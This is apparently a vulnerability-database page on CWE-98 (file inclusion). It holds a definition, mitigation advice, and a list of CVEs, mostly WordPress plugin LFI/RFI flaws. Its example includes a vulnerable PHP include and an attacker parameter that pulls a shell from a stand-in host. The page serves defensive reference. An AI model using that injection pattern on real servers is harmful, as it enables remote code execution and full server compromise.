Fallos del tipo CWE-98

1303 resultados

Inclusão Remota de Arquivo

Fraqueza onde a aplicação inclui ou executa um arquivo cujo caminho é controlado (total ou parcialmente) por um atacante, frequentemente via parâmetros GET/POST. Se o servidor não valida a origem, um atacante pode fazer a aplicação carregar código malicioso de um servidor externo, levando a execução arbitrária com privilégios da app.

Ejemplo

Um PHP com `include($_GET['page'].'.php')` onde o atacante passa `page=http://atacante.com/shell` acaba incluindo e executando um script malicioso hospedado remotamente, concedendo acesso total ao servidor.

Cómo mitigar

Valide e normalize qualquer entrada de usuário antes de usar em include/require; use uma whitelist de arquivos permitidos; desabilite `allow_url_include` no PHP; implemente controle de acesso e isolamento de sessão. Nunca confie em entrada externa para construir caminhos de arquivo.

CVE-2025-0632CRITICALLocal File Inclusion (LFI) leading to sensitive data exposureEPSS 0.9%CVE-2024-13592HIGHTeam Builder For WPBakery Page Builder(Formerly Visual Composer) <= 1.0 - Authenticated (Contributor+) Local File InclusionEPSS 0.9%CVE-2025-23948HIGHWordPress Background animation blocks Plugin <= 2.1.5 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2024-5577CRITICALWhere I Was, Where I Will Be <= 1.1.1 - Unauthenticated Remote File InclusionEPSS 0.9%CVE-2025-39584HIGHWordPress Eventin plugin <= 4.0.25 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2024-12571CRITICALStore Locator <= 3.98.10 - Unauthenticated Local File InclusionEPSS 0.9%CVE-2025-32519HIGHWordPress IDonate plugin <= 2.1.18 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-39592HIGHWordPress Subscribe to Unlock Lite plugin <= 1.3.0 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2025-32692HIGHWordPress WP Subscription Forms plugin <= 1.2.4 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2025-23949HIGHWordPress Improved Sale Badges – Free Version Plugin <= 1.0.1 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-2101HIGHEdumall <= 4.2.4 - Unauthenticated Local File InclusionEPSS 0.9%CVE-2025-31015HIGHWordPress SMTP Service, Email Delivery Solved! — MailHawk plugin <= 1.3.1 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2024-36415CRITICALSuiteCRM Improper Control of Filename for Include Statement in PHP and Unrestricted Upload of File with Dangerous content leads to authenticated remote code executionEPSS 0.9%CVE-2024-1382HIGHRestaurant Reservations <= 1.9 - Directory Traversal to Authenticated (Contributor+) Local File InclusionEPSS 0.9%CVE-2025-32155HIGHWordPress Beds24 Online Booking plugin <= 2.0.28 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2015-6461Remote file inclusion allows an attacker to craft a specific URL referencing the Schneider Electric Modicon BMXNOC0401, BMXNOE0100, BMXNOE01EPSS 0.9%CVE-2025-28916CRITICALWordPress Docpro plugin <= 2.0.1 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-11977MEDIUMHappyForms <= 1.26.12 - Authenticated (Admin+) Local File InclusionEPSS 0.9%CVE-2026-27556HIGHLocal File Inclusion in /index.php/ajax/save_iodd_parametersEPSS 0.9%CVE-2023-5099HIGHHTML filter and csv-file search <= 2.7 - Authenticated (Contributor+) Local File Inclusion via ShortcodeEPSS 0.9%